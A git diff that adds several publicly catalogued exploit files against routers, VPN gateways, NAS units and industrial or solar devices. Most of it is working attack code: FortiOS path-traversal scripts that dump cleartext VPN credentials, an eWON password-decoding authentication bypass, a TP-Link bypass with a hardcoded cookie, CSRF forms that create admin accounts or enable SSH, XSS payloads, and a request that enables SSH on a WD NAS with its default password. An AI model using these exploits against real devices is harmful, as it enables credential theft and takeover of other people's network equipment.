diff --git a/exploits/hardware/webapps/47250.rb b/exploits/hardware/webapps/47250.rb
new file mode 100755
index 000000000..946ae13e8
--- /dev/null
+++ b/exploits/hardware/webapps/47250.rb
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
+      'Description'     => %q{
+          This module attempts to find D-Link router DIR-600M which is
+vulnerable to Incorrect Access Control. The vulnerability exists in
+        wan.htm, which is accessible without authentication. This
+vulnerabilty can lead an attacker to manipulate WAN settings.
+        This module has been tested successfully on Firmware Version
+3.01,3.02,3.03,3.04,3.05,3.06.
+      },
+      'Author'          => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          'CVE', '2019-13101'
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 08 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(80)
+      ])
+  end
+
+  def run_host(ip)
+    res = send_request_cgi({'uri' => '/login.htm'})
+    if res.nil? or res.code == 404
+      print_error("#{rhost}:#{rport} - Host is down.")
+      return
+    end
+
+    if res and res.code == 200 and res.body =~ /D-Link/
+      print_good("#{rhost}:#{rport} - It is a D-Link router")
+    else
+      print_error("#{rhost}:#{rport} - Not a D-Link router")
+      return
+    end
+
+    res = send_request_cgi({'uri' => '/wan.htm'})
+
+    if res and res.code == 200 and res.body =~ /PPPoE/
+      print_good("#{rhost}:#{rport} - Router is vulnerable for
+Incorrect Access Control. CVE-2019-13101")
+    else
+      print_error("#{rhost}:#{rport} - Router is with different firmware.")
+      return
+    end
+
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47287.rb b/exploits/hardware/webapps/47287.rb
new file mode 100755
index 000000000..48eca7846
--- /dev/null
+++ b/exploits/hardware/webapps/47287.rb
@@ -0,0 +1,78 @@
+# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Google Dork: intext:"Please Login" inurl:"/remote/login"
+# Date: 17/08/2019
+# Exploit Author: Carlos E. Vieira
+# Vendor Homepage: https://www.fortinet.com/
+# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
+# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+# Tested on: 5.6.6
+# CVE : CVE-2018-13379
+
+require 'msf/core'
+class MetasploitModule < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Post::File 
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SSL VPN FortiOs - System file leak',
+			'Description'    => %q{
+				FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
+				This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
+				This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+			},
+			'References'     =>
+			    [
+			        [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
+			    ],
+			'Author'         => [ 'lynx (Carlos Vieira)' ],
+			'License'        => MSF_LICENSE,
+			 'DefaultOptions' =>
+		      {
+		        'RPORT' => 443,
+		        'SSL' => true
+		      },
+			))
+
+	end
+
+
+	def run()
+		print_good("Checking target...")
+		res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})
+
+		if res && res.code == 200
+			print_good("Target is Vulnerable!")
+			data = res.body
+			current_host = datastore['RHOST']
+			filename = "msf_sslwebsession_"+current_host+".bin"
+			File.delete(filename) if File.exist?(filename)
+			file_local_write(filename, data)
+			print_good("Parsing binary file.......")
+			parse()
+		else
+			if(res && res.code == 404)
+				print_error("Target not Vulnerable")
+			else
+				print_error("Ow crap, try again...")
+			end
+		end
+	end
+	def parse()
+		current_host = datastore['RHOST']
+
+	    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
+	    words = 0
+	    while (line = fileObj.gets)
+	    	printable_data = line.gsub(/[^[:print:]]/, '.')
+	    	array_data = printable_data.scan(/.{1,60}/m)
+	    	for ar in array_data
+	    		if ar != "............................................................"
+	    			print_good(ar)
+	    		end
+	    	end
+	    	#print_good(printable_data)
+	    	
+		end	
+		fileObj.close	
+	end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47288.py b/exploits/hardware/webapps/47288.py
new file mode 100755
index 000000000..8e0cde795
--- /dev/null
+++ b/exploits/hardware/webapps/47288.py
@@ -0,0 +1,96 @@
+# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
+# Google Dork: intext:"Please Login" inurl:"/remote/login"
+# Date: 17/08/2019
+# Exploit Author: Carlos E. Vieira
+# Vendor Homepage: https://www.fortinet.com/
+# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
+# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
+# Tested on: 5.6.6
+# CVE : CVE-2018-13379
+
+# Exploit SSLVPN Fortinet - FortiOs
+#!/usr/bin/env python
+import requests, sys, time
+import urllib3
+urllib3.disable_warnings()
+
+
+def leak(host, port):
+	print("[!] Leak information...")
+	try:
+		url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+		headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}		
+		r=requests.get(url, headers=headers, verify=False, stream=True)
+		img=r.raw.read()
+		if "var fgt_lang =" in str(img):
+			with open("sslvpn_websession_"+host+".dat", 'w') as f:
+				f.write(img)		
+			print("[>] Save to file ....")
+			parse(host)
+			print("\n")
+			return True
+		else:
+			return False
+	except requests.exceptions.ConnectionError:
+		return False
+def is_character_printable(s):
+	return all((ord(c) < 127) and (ord(c) >= 32) for c in s)
+
+def is_printable(byte):
+	if is_character_printable(byte):
+    		return byte
+  	else:
+    		return '.' 
+
+def read_bytes(host, chunksize=8192):
+	print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
+	with open("sslvpn_websession_"+host+".dat", "rb") as f:
+    		while True:
+        		chunk = f.read(chunksize)
+        		if chunk:
+          			for b in chunk:
+            				yield b
+        		else:
+          			break
+def parse(host):
+    print("[!] Parsing Information...")
+    memory_address = 0
+    ascii_string = ""
+    for byte in read_bytes(host):
+    	ascii_string = ascii_string + is_printable(byte)
+	if memory_address%61 == 60:
+		if ascii_string!=".............................................................":
+	    		print ascii_string
+	    	ascii_string = ""
+	memory_address = memory_address + 1
+
+def check(host, port):
+    print("[!] Check vuln...")
+    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+    try:
+        r = requests.get("https://" + host + ":" + port + uri, verify=False)
+        if(r.status_code == 200):
+            return True
+        elif(r.status_code == 404):
+            return False
+        else:
+            return False
+    except:
+        return False
+def main(host, port):
+    print("[+] Start exploiting....")
+    vuln = check(host, port)
+    if(vuln):
+        print("[+] Target is vulnerable!")
+        bin_file = leak(host, port)
+    else:
+        print("[X] Target not vulnerable.")
+
+if __name__ == "__main__":
+
+    if(len(sys.argv) < 3):
+        print("Use: python {} ip/dns port".format(sys.argv[0]))
+    else:
+        host = sys.argv[1]
+        port = sys.argv[2]
+        main(host, port)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47351.txt b/exploits/hardware/webapps/47351.txt
new file mode 100644
index 000000000..5b93d4dfc
--- /dev/null
+++ b/exploits/hardware/webapps/47351.txt
@@ -0,0 +1,40 @@
+Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
+
+# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
+
+# Date: 31.03.2019
+
+# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
+
+# Vendor Homepage: https://dasanzhone.com
+
+# Version: <= S3.1.285
+
+# Alternate Version: <= S3.0.738
+
+# Tested on: version S3.1.285 (alternate version S3.0.738)
+
+# CVE : CVE-2019-10677
+
+
+= Reflected Cross-Site Scripting (XSS) =
+
+http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
+
+
+= Stored Cross-Site Scripting (XSS) =
+
+* WiFi network plaintext password
+
+http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
+
+* CSRF token
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
+
+
+= Clickjacking =
+
+<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47380.py b/exploits/hardware/webapps/47380.py
new file mode 100755
index 000000000..f601ce8e2
--- /dev/null
+++ b/exploits/hardware/webapps/47380.py
@@ -0,0 +1,89 @@
+#! /usr/bin/env python
+''' 
+    # Exploit Title: eWON v13.0 Authentication Bypass
+    # Date: 2018-10-12
+    # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
+    # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
+    #                  [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
+    # Vendor Homepage: https://www.ewon.biz
+    # Version: eWon Firmware 12.2 to 13.0
+    # Tested on: eWon Flexy with Firmware 13.0s0
+    
+	Copyright 2019 Photubias(c)
+
+        This program is free software: you can redistribute it and/or modify
+        it under the terms of the GNU General Public License as published by
+        the Free Software Foundation, either version 3 of the License, or
+        (at your option) any later version.
+
+        This program is distributed in the hope that it will be useful,
+        but WITHOUT ANY WARRANTY; without even the implied warranty of
+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+        GNU General Public License for more details.
+
+        You should have received a copy of the GNU General Public License
+        along with this program.  If not, see <http://www.gnu.org/licenses/>.
+        
+        File name eWON-Flewy-Pwn.py
+        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
+
+        This script will perform retrieval of clear text credentials for an eWON Flexy router
+         Tested on the eWON Flexy 201 with Firmware 13.0s0
+         Only requires a valid username (default = adm) and 
+         this user must have the Rights 'View IO' & 'Change Configuration'
+         
+        It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
+          and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0)       
+'''
+username = 'adm'
+
+import urllib2,urllib,base64,binascii,os
+
+def decode(encpass):
+    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
+    def convertPass(password):
+        if (len(password)/2) > 19:
+            print('Error, password can not exceed 19 characters')
+            exit()
+        return hexxor(password, xorString[:len(password)])
+    def hexxor(a, b):
+        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
+    if encpass.startswith('#_'):
+        encpass = encpass.split('_')[2]
+    coded = base64.b64decode(encpass)
+    codedhex = binascii.hexlify(coded)[:-4]
+    clearpass = binascii.unhexlify(convertPass(codedhex))
+    print('Decoded password: ' + clearpass)
+
+def getUserData(userid, strIP):
+    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
+    postwsdlist = postwsdlist.replace('|1','|'+str(userid))
+    postdata = {'wsdList' : postwsdlist}
+    b64auth = base64.b64encode(username+':').replace('=','')
+    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
+    resultarr = result.split('","')
+    if len(resultarr) == 20:
+        fname = str(resultarr[1])
+        lname = str(resultarr[2])
+        usern = str(resultarr[3])
+        if len(usern) == 0:
+            return True
+        encpassword = resultarr[4]
+        print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
+        decode(encpassword)
+        print('---')
+        return True
+    else:
+        return True
+
+strIP = raw_input('Please enter an IP [10.0.0.53]: ')
+if strIP == '': strIP = '10.0.0.53'
+print('---')
+
+for i in range(20):
+    if not getUserData(i, strIP):
+        print('### That\'s all folks ;-) ###')
+        raw_input()
+        exit(0)
+        
+raw_input('All Done')
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47399.txt b/exploits/hardware/webapps/47399.txt
new file mode 100644
index 000000000..5b81539a8
--- /dev/null
+++ b/exploits/hardware/webapps/47399.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
+# Google Dork: intitle:"My Book World Edition - MyBookWorld"
+# Date: 19th Sep, 2019
+# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
+# Vendor Homepage: https://wd.com/
+# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
+# Version: <= 1.02.12
+# Tested on: Firmware
+# CVE : CVE-2019-16399
+POST /admin/system_advanced.php?lang=en HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+Content-Length: 241
+orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
+/*
+The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
+There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware.
+*/
+Security Researcher - Noman Riffat, National Security Services Group (NSSG)
+@nomanriffat, @nssgoman
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47433.txt b/exploits/hardware/webapps/47433.txt
new file mode 100644
index 000000000..3a48eafc1
--- /dev/null
+++ b/exploits/hardware/webapps/47433.txt
@@ -0,0 +1,47 @@
+# Title: V-SOL GPON/EPON OLT Platform 2.03 - Unauthenticated Configuration Download
+# Date: 2019-09-27
+# Author: LiquidWorm
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The device OLT Web Management Interface is vulnerable to unauthenticated
+configuration download and information disclosure vulnerability when direct
+object reference is made to the usrcfg.conf file using an HTTP GET method. This
+will enable the attacker to disclose sensitive information and help her in
+authentication bypass, privilege escalation and/or full system access.
+
+Tested on: GoAhead-Webs
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5534
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5534.php
+
+25.09.2019
+
+--
+# PoC
+
+1# curl http://192.168.8.200/device/usrcfg.conf
+2# curl http://192.168.8.201/action/usrcfg.conf
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47434.txt b/exploits/hardware/webapps/47434.txt
new file mode 100644
index 000000000..822a1b397
--- /dev/null
+++ b/exploits/hardware/webapps/47434.txt
@@ -0,0 +1,71 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Cross-Site Request Forgery
+# Author: LiquidWorm 
+# Discovery Date: 2019-09-26 
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5536
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+CSRF add admin:
+---------------
+
+<html>
+  <body>
+    <form action="http://192.168.8.200/action/user.html" method="POST">
+      <input type="hidden" name="user_name_add" value="Spy" />
+      <input type="hidden" name="user_password_add" value="pass123" />
+      <input type="hidden" name="password_confirm_add" value="pass123" />
+      <input type="hidden" name="user_role" value="1" />
+      <input type="hidden" name="user_name_mod" value="" />
+      <input type="hidden" name="user_password_mod" value="" />
+      <input type="hidden" name="password_confirm_mod" value="" />
+      <input type="hidden" name="user_role_mod" value="0" />
+      <input type="hidden" name="option_um" value="100/" />
+      <input type="hidden" name="who" value="0" />
+      <input type="submit" value="Init" />
+    </form>
+  </body>
+</html>
+
+
+CSRF enable SSH:
+----------------
+
+<html>
+  <body>
+    <form action="https://192.168.8.200/action/sshglobal.html" method="POST">
+      <input type="hidden" name="ssh_enable" value="1" />
+      <input type="hidden" name="ssh_version" value="2" />
+      <input type="hidden" name="auth_retries" value="6" />
+      <input type="hidden" name="ssh_timeout" value="120" />
+      <input type="hidden" name="ssh_modulus" value="2048" />
+      <input type="hidden" name="who" value="0" />
+      <input type="submit" value="Init" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47435.txt b/exploits/hardware/webapps/47435.txt
new file mode 100644
index 000000000..40e0b96b0
--- /dev/null
+++ b/exploits/hardware/webapps/47435.txt
@@ -0,0 +1,80 @@
+# Exploit Title: V-SOL GPON/EPON OLT Platform 2.03 - Remote Privilege Escalation
+# Author: LiquidWorm 
+# Discovery Date: 2019-09-26 
+# Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+# Product web page: https://www.vsolcn.com
+# Tested on: GoAhead-Webs
+# Advisory ID: ZSL-2019-5538
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
+# Affected version: V2.03.62R_IPv6
+# V2.03.54R
+# V2.03.52R
+# V2.03.49
+# V2.03.47
+# V2.03.40
+# V2.03.26
+# V2.03.24
+# V1.8.6
+# V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+
+
+V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
+
+
+Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
+Product web page: https://www.vsolcn.com
+Affected version: V2.03.62R_IPv6
+                  V2.03.54R
+                  V2.03.52R
+                  V2.03.49
+                  V2.03.47
+                  V2.03.40
+                  V2.03.26
+                  V2.03.24
+                  V1.8.6
+                  V1.4
+
+Summary: GPON is currently the leading FTTH standard in broadband access
+technology being widely deployed by service providers around the world.
+GPON/EPON OLT products are 1U height 19 inch rack mount products. The
+features of the OLT are small, convenient, flexible, easy to deploy, high
+performance. It is appropriate to be deployed in compact room environment.
+The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
+ICT applications.
+
+Desc: The application suffers from a privilege escalation vulnerability.
+Normal user can elevate his/her privileges by sending a HTTP POST request
+setting the parameter 'user_role_mod' to integer value '1' gaining admin
+rights.
+
+
+<html>
+  <body>
+    <form action="http://192.168.8.200/action/user.html" method="POST">
+      <input type="hidden" name="user_name_add" value="" />
+      <input type="hidden" name="user_password_add" value="" />
+      <input type="hidden" name="password_confirm_add" value="" />
+      <input type="hidden" name="user_role" value="0" />
+      <input type="hidden" name="user_password_mod" value="test" />
+      <input type="hidden" name="password_confirm_mod" value="test" />
+      <input type="hidden" name="user_role_mod" value="1" />
+      <input type="hidden" name="option_um" value="17" />
+      <input type="hidden" name="who" value="1" />
+      <input type="submit" value="Escalate" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47480.txt b/exploits/hardware/webapps/47480.txt
new file mode 100644
index 000000000..5a4d75511
--- /dev/null
+++ b/exploits/hardware/webapps/47480.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
+# Date: 2019-10-08
+# Exploit Author: Borja Merino and Eduardo Villaverde
+# Vendor Homepage: https://www.sma.de
+# Version: Firmware Version 1.6 and prior
+# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
+# CVE : CVE-2019-13529
+# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01
+
+<!-- Change any hidden value -->
+
+<iframe style="display:none" name="csrf-frame"></iframe>
+<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
+  <input type='hidden' name='RadioButtonDhcp' value='off'>
+  <input type='hidden' name='IpAddr' value='1.1.1.1'>
+  <input type='hidden' name='SubnetMask' value='255.255.255.0'>
+  <input type='hidden' name='Gateway' value='1.1.1.1'> 
+  <input type='hidden' name='DnsIpAddr' value='5.5.5.1'>
+  <input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>
+  <input type='hidden' name='StaticNatPortHttp' value='80'>
+  <input type='hidden' name='WebserverPort' value='80'>
+  <input type='hidden' name='WebservicePort' value='80'>
+  <input type='hidden' name='RadioButtonModbus' value='off'>
+  <input type='hidden' name='ModbusPort' value='502'>
+  <input type='hidden' name='BConfirm' value='Confirmar'>
+  <input type='submit' value='submit'>
+</form>
+<script>document.getElementById("csrf-form").submit()</script>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47483.py b/exploits/hardware/webapps/47483.py
new file mode 100755
index 000000000..9be581ea1
--- /dev/null
+++ b/exploits/hardware/webapps/47483.py
@@ -0,0 +1,72 @@
+# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
+# Date: 2019-06-20
+# Exploit Author: Uriel Kosayev
+# Vendor Homepage: https://www.tp-link.com
+# Version: TL-WR1043ND V2
+# Tested on: TL-WR1043ND V2
+# CVE : CVE-2019-6971
+# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971
+
+import requests
+
+ascii = '''
+  __________        __    _       __  
+ /_  __/ __ \      / /   (_)___  / /__
+  / / / /_/ /_____/ /   / / __ \/ //_/
+ / / / ____/_____/ /___/ / / / / ,<   
+/_/ /_/         /_____/_/_/ /_/_/|_|  
+
+'''
+print(ascii)
+Default_Gateway = raw_input("Enter your TP-Link router IP: ")
+
+# Constants
+url = 'http://'
+url2 = '/userRpm/LoginRpm.htm?Save=Save'
+full = url + Default_Gateway + url2
+# full = str(full)
+
+# The full GET request with the cookie authorization hijacked
+req_header = {
+    'Host': '{}'.format(Default_Gateway),
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
+    'Connection': 'close',
+    'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+try:
+    response = requests.get(full, headers=req_header).content
+except requests.exceptions.ConnectionError:
+    print("Enter a valid Default Gateway IP address\nExiting...")
+    exit()
+generate = response.split('/')[3] # Gets the randomized URL "session ID"
+
+
+option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")
+
+if option_1 is 1:
+
+    if generate in response:
+        print('Vulnerable!\n')
+        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
+        if option_2 is 2:
+            newssid = raw_input('New name: ')
+            ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
+                newssid)
+            changessid_full = url + Default_Gateway + '/' + generate + ssid_url
+            requests.get(changessid_full, headers=req_header)
+            print('Changed to: {}'.format(newssid))
+        else:
+            ("Please choose the correct option.\nExiting...")
+            exit()
+    else:
+        print('Not Vulnerable')
+        exit()
+else:
+    print("Please choose the correct option.\nExiting...")
+    exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47491.txt b/exploits/hardware/webapps/47491.txt
new file mode 100644
index 000000000..96ddca3f7
--- /dev/null
+++ b/exploits/hardware/webapps/47491.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
+# Date: 2019-10-03
+# Exploit Author: Prof. Joas Antonio
+# Vendor Homepage: https://www.intelbras.com/pt-br/
+# Software Link: http://en.intelbras.com.br/node/25896
+# Version: 1.0.18
+# Tested on: Windows
+# CVE : CVE-2019–17411
+
+# PoC 1:
+
+1) Login to your router
+
+2) After signing in as WAN Settings
+
+3) Select for PPPOE mode
+
+4) In the Service Name and Server Name field, enter any of these payloads:
+
+<script> alert ("Hacked") </script>
+
+<script> alert (1) </script>
+
+# PoC burp.txt
+
+POST /goform/AdvSetWan HTTP/1.1
+Host: TARGET
+Content-Length: 281
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Referer: http://TARGET/wan_connected.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
+Connection: close
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47541.txt b/exploits/hardware/webapps/47541.txt
new file mode 100644
index 000000000..0b82dd77b
--- /dev/null
+++ b/exploits/hardware/webapps/47541.txt
@@ -0,0 +1,23 @@
+# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
+# Date: 2019-10-24
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+# CVE: N/A
+ 
+# 1. Description:
+# An issue was discovered in AUO SunVeillance Monitoring System.
+# There is an incorrect access control vulnerability that can allow the attacker to 
+# bypass the authentication mechanism, and upload files to the server without any authentication.
+ 
+# 2. Proof of Concept:
+(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without 
+    any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
+(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled.
+(3) Now you can upload a file successfully.
+(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side.
+ 
+Thank you for your kind assistance.
+
+Luca
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47542.txt b/exploits/hardware/webapps/47542.txt
